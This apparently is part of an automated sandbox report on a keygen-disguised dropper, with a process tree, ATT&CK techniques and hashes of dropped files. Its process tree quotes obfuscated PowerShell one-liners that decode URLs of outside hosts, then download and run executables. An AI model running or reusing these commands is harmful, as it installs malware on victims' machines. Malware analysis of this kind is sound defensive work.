'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        3⤵
        • Blacklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1516
        • C:\Users\Public\mus.exe
          "C:\Users\Public\mus.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          PID:2512
          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
            5⤵
            • Executes dropped EXE
            PID:2680
          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2724
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
              6⤵
              • Executes dropped EXE
              PID:2964
          • C:\Users\Public\mus.exe
            "C:\Users\Public\mus.exe"
            5⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2844
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\ba1.hta"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1832

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
    MD5

    597009ea0430a463753e0f5b1d1a249e

    SHA1

    4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

    SHA256

    3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

    SHA512

    5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
    MD5

    b6d38f250ccc9003dd70efd3b778117f

    SHA1

    d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

    SHA256

    4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

    SHA512

    67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
    MD5

    02ff38ac870de39782aeee04d7b48231

    SHA1

    0390d39fa216c9b0ecdb38238304e518fb2b5095

    SHA256

    fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

    SHA512

    24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_66f5dca1-dd3f-48f0-b80c-297fcafa64a2
    MD5

    354b8209f647a42e2ce36d8cf326cc92

    SHA1

    98c3117f797df69935f8b09fc9e95accfe3d8346

    SHA256

    feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

    SHA512

    420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94f9311d-21f6-41d1-a7e0-861cccb933c1
    MD5

    e36e413334d4226cfecaebdd90e31c04

    SHA1

    a70ab4d400261150d6ce6798cadc6e2539ec84c7

    SHA256

    fa3e9bdb2278858c97da8478ed573db4a6642363775b1530ab0b24571e2c0f4a

    SHA512

    f2cd799769189ca59190fee5b1a44f0a7ead22874763291462fbe86865cdba5ff2854279a0d918b3769ec4d8f4e9198b5ac4f30dc3325386da5b73e18af2ca63

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94f9311d-21f6-41d1-a7e0-861cccb933c1
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94f9311d-21f6-41d1-a7e0-861cccb933c1
    MD5

    e36e413334d4226cfecaebdd90e31c04

    SHA1

    a70ab4d400261150d6ce6798cadc6e2539ec84c7

    SHA256

    fa3e9bdb2278858c97da8478ed573db4a6642363775b1530ab0b24571e2c0f4a

    SHA512

    f2cd799769189ca59190fee5b1a44f0a7ead22874763291462fbe86865cdba5ff2854279a0d918b3769ec4d8f4e9198b5ac4f30dc3325386da5b73e18af2ca63

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94f9311d-21f6-41d1-a7e0-861cccb933c1
    MD5

    e36e413334d4226cfecaebdd90e31c04

    SHA1

    a70ab4d400261150d6ce6798cadc6e2539ec84c7

    SHA256

    fa3e9bdb2278858c97da8478ed573db4a6642363775b1530ab0b24571e2c0f4a

    SHA512

    f2cd799769189ca59190fee5b1a44f0a7ead22874763291462fbe86865cdba5ff2854279a0d918b3769ec4d8f4e9198b5ac4f30dc3325386da5b73e18af2ca63

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
    MD5

    df44874327d79bd75e4264cb8dc01811

    SHA1

    1396b06debed65ea93c24998d244edebd3c0209d

    SHA256

    55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

    SHA512

    95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
    MD5

    5e3c7184a75d42dda1a83606a45001d8

    SHA1

    94ca15637721d88f30eb4b6220b805c5be0360ed

    SHA256

    8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

    SHA512

    fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
    MD5

    be4d72095faf84233ac17b94744f7084

    SHA1

    cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

    SHA256

    b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

    SHA512

    43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    c74e1142bd43bc20899fbc351f7913dc

    SHA1

    448f9d05616a2e6676df8cd52593c7980f969cc4

    SHA256

    2d0e61e4b62d4dbed7453b61279d92ccf94cc584ac50b441201d7cab910952ee

    SHA512

    0c043f2c7c8d85c84610009948e716676ced3123e77325dcc781462b54ff9f1c369fe0aa40c579fe3572882b2f67050190b05627746462d59a654071ec5d1f09

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    08e6073fefa75edc401e5ae7acc0abfb

    SHA1

    fa5fc4973f9929dc7005c76762da25625aa4a06c

    SHA256

    5a2cc0bb3b52aa41d769e305f47271add2d49ecd985c0d45e286d6e9d264d3dc

    SHA512

    d221771abba3afc2d79c892ed153b2b4665d83e4fb1d5fe492c7b47df464672749c9853b1679424f2c42431131c03034911280e4205f5e78f771801a9a6732ec

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    08e6073fefa75edc401e5ae7acc0abfb

    SHA1

    fa5fc4973f9929dc7005c76762da25625aa4a06c

    SHA256

    5a2cc0bb3b52aa41d769e305f47271add2d49ecd985c0d45e286d6e9d264d3dc

    SHA512

    d221771abba3afc2d79c892ed153b2b4665d83e4fb1d5fe492c7b47df464672749c9853b1679424f2c42431131c03034911280e4205f5e78f771801a9a6732ec

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    08e6073fefa75edc401e5ae7acc0abfb

    SHA1

    fa5fc4973f9929dc7005c76762da25625aa4a06c

    SHA256

    5a2cc0bb3b52aa41d769e305f47271add2d49ecd985c0d45e286d6e9d264d3dc

    SHA512

    d221771abba3afc2d79c892ed153b2b4665d83e4fb1d5fe492c7b47df464672749c9853b1679424f2c42431131c03034911280e4205f5e78f771801a9a6732ec

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    08e6073fefa75edc401e5ae7acc0abfb

    SHA1

    fa5fc4973f9929dc7005c76762da25625aa4a06c

    SHA256

    5a2cc0bb3b52aa41d769e305f47271add2d49ecd985c0d45e286d6e9d264d3dc

    SHA512

    d221771abba3afc2d79c892ed153b2b4665d83e4fb1d5fe492c7b47df464672749c9853b1679424f2c42431131c03034911280e4205f5e78f771801a9a6732ec

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    162f2424012d70959b549a57f199a1a2

    SHA1

    8d2b3c82a35c6edd93e3881901774fb7132f4b6f

    SHA256

    b91f0485a41f31bf4dabd32a92373bd81cf591cb0352d0328ec7b2e6e73c3954

    SHA512

    cdbae5c2788a47f491bf50f6f3154ff8ce46b43ad25eb7d55ade464cc1aae04770d900747fdb8cca9086012978aa67c344904768b72578cdc345232c41b00427

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    7e0b1598e651ce7cf0a9edd734ccac8b

    SHA1

    615be9996a6e15769ad5156c4658137e774fa801

    SHA256

    815ae30b85ea3188daf32d117dc72d021eb9841ed2ca99444373381292615926

    SHA512

    1a5da0c835fead8f83ebb80d5a02e0a2b3ca78b0482142facac3e516257529251baa471c23875e807a311b0e344aa249af9c710b0bd600b7045d289e6d5a5d56

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    7daf13833a89f6d01518c8bda1617b8f

    SHA1

    0656c3e07f3aef84b46d6f000107c030284dfed5

    SHA256

    c57704c14eb3c4f6b7d0a2f92185698cea361a2b484f59e55fcee56c92c89581

    SHA512

    a53bc4eea52ac24ec2c1d7894eb4778f8ad4a5e35a41c495cb673c5b437f8707350f9b7601df97fbb2d8b953d0a14c1adf4a8680a60552a4aa71489997a267bc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    5f0111343bce4f9f3f03a0b6369c93a5

    SHA1

    7f48bf5bdc70bd3a83c4b8862c71357a03a869b2

    SHA256

    9e489316d6f5b7e575ec5fae8e4ca6bc91a7aee3842ec78b14ebedbb3b967744

    SHA512

    9aca60a019bcf6c15df4470eb63cca11921bd46314dd5db62c01eb980667b27cfdbff5a844b8418e7ac1907b7d3da6b254e9de6912558b16c5ee0c18ccfde8a3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    1eb15d0c437a4a14e419c73a1f03b871

    SHA1

    6921f795129b0b20b3fffeaa364e702810f2e65a

    SHA256

    f4f19c2c2616a166b2dad0801f849f6d3284a2adde7b9e166b8b0b2d1ef80f98

    SHA512

    787da091eb02f802809d4e9fa1c27f0fb83ad020b478b261ff2f2a5b010792d37fb09e6b2593842b5e8ad5aa900a32009703ea8921499eff3ba1fa0fb8b9bf23

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    d6a2882f866d1aedd707e3487cb38e25

    SHA1

    960c35b5310b161d45d6fee8dc2505c353b451ea

    SHA256

    8dd3970457bd452e47370626c65ce4d04e49df4bbe4628bef85e4287216f1bf6

    SHA512

    d11e5dcf19a56cbc0343ac02641e04be2db9b3ca85bd8c981909b99da31c114e8fda5e31e9cdb2143188a87c14f7dad4606daa01fd8dfee53603ffe0433c1168

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    eba26591ef86e0b12e95217377d72b28

    SHA1

    de4f6b1e4ab093b0291193232842022f782effb4

    SHA256

    f4d49d34ac290c991afbad6ceb0ae59bcb233f1a58492aec35a0a0a4950f52cd

    SHA512

    18b9bc3f6593b58b6164011fa92fd78a26b4faa0359cae7ee7d6ced94a5e8444b74466eda5d7f4db8ac3da1b1fe3ba50e84ceb26a0c2a9eecd086758571fb335

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    79f230e4d817177f7c18187619a53900

    SHA1

    0ddce98c0448f58937390871e89ad3373779e577

    SHA256

    b52495041185cc7436a3e52a61c22a657dbdeeba219823a51cf83fca3e0e6105

    SHA512

    99c24a775e1bf479ea936e8ffa02473bff9e68edc1ca56c23656e0e839a915098805b6583165d85686d56de0c5719f60e5cc6be1a1a3df800740121ae16a6507

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    8a56fbcb0f74e7a4a2748c9757a5fca7

    SHA1

    82dec719c75c26d92926d8d29c4e5581912bc55f

    SHA256

    ecfe5370529ada4d52bfe51726fe0d911698a32cd549d3690af3de30bdb7dc86

    SHA512

    96ffe15f8f0cf0b587a8fc9b97a0b032684ed939bb1fa2138bffc2575a2d251eb5cb8faa147467e2ddd1ed50ef58935b8548e68408dd2700c85362546cf060f2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    aaac362d061670879d32fadb17c467f9

    SHA1

    969d987e4551f8306694a62379a5bdac3d3b8d56

    SHA256

    8815b77d4aea0026c1f097266cc630ec4f38f6c801cc9e045c17d85008fea788

    SHA512

    91bac300d4fe6ab77347f9fcd808a83ce72976a6d011e2111e630b61e1241043fb95aa824a7a8dea038d7841fefbca2c5b56f82dff54e1de126a4a9c6d35fb9a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    17145687971a505125d3bd2fd96f07e8

    SHA1

    a0c0b461facc1c3f6c115b23c1082886dcf82e4e

    SHA256

    274b38f775f29d14a6aa92d8ad5c698079b07eb465eff11b651c46b527a33192

    SHA512

    3feac2d779236dea8a8e2bfd7f37f6141ad98313c423ad0db406cf427184587b10bd53e5b7e03ef5f1014b64435543494aab14dc1048b67e2df30cd4e0f5f711

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    17145687971a505125d3bd2fd96f07e8

    SHA1

    a0c0b461facc1c3f6c115b23c1082886dcf82e4e

    SHA256

    274b38f775f29d14a6aa92d8ad5c698079b07eb465eff11b651c46b527a33192

    SHA512

    3feac2d779236dea8a8e2bfd7f37f6141ad98313c423ad0db406cf427184587b10bd53e5b7e03ef5f1014b64435543494aab14dc1048b67e2df30cd4e0f5f711

  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\Keygen.exe
  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\Keygen.exe
  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\b.hta
  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\b1.hta
    MD5

    c57770e25dd4e35b027ed001d9f804c2

    SHA1

    408b1b1e124e23c2cc0c78b58cb0e595e10c83c0

    SHA256

    bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5

    SHA512

    ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\ba.hta
    MD5

    b762ca68ba25be53780beb13939870b2

    SHA1

    1780ee68efd4e26ce1639c6839c7d969f0137bfd

    SHA256

    c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1

    SHA512

    f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\ba1.hta
    MD5

    a2ea849e5e5048a5eacd872a5d17aba5

    SHA1

    65acf25bb62840fd126bf8adca3bb8814226e30f

    SHA256

    0c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c

    SHA512

    d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f

  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\m.hta
  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\m1.hta
    MD5

    5eb75e90380d454828522ed546ea3cb7

    SHA1

    45c89f292d035367aeb2ddeb3110387a772c8a49

    SHA256

    dd43305abbbe5b6cc4ab375b6b0c9f8667967c35bb1f6fefb0f1a59c7c73bd5e

    SHA512

    0670ef4f687c4814125826b996d10f6dd8a1dd328e04b9c436ee657486b27b1eefad5b82dcc25bd239d36b7ac488f98e5adcff56c5e82f7d0ed41f03301947c4

  • C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\start.bat
    MD5

    68d86e419dd970356532f1fbcb15cb11

    SHA1

    e9ef9a9d047f1076ba2afbe4eabec2ea2338fb0a

    SHA256

    d150a28b978b2d92caac25ee0a805dec96381471702a97f1099707b8538c6cbe

    SHA512

    3078c8c33b18ca1aa3bb2f812e5f587f5b081a4bd857f942ab382383faf09dbe8af38054546bf49037b79081c9406dc25647ae5bd843abc8fcca25c7b3afae14

  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
    MD5

    385e5b97d97b89cacff3594eafeb0e5e

    SHA1

    70e73110860c36c83c504f4804e3cebde2a618a1

    SHA256

    7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

    SHA512

    f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
    MD5

    35bccedd18360d94a33d86c09af8480c

    SHA1

    013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

    SHA256

    ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

    SHA512

    31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    7a6a1ab969a2c94d1f2d6e13f7742021

    SHA1

    18b7efe898785e9b971109c8bce656cc3fb14f4d

    SHA256

    4cf45bab031e9b844c171f19bd7b274666f91d6d56e6f0f831c95623ea53b05c

    SHA512

    22d96ee2e045c2f1b9df9fd1eaa04de678e91853d0544435a17196f17fd50435ff2d8fdbaf76c42ce6c75688324bc072a6d0f2ed05b7076302247521efdf8a85

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
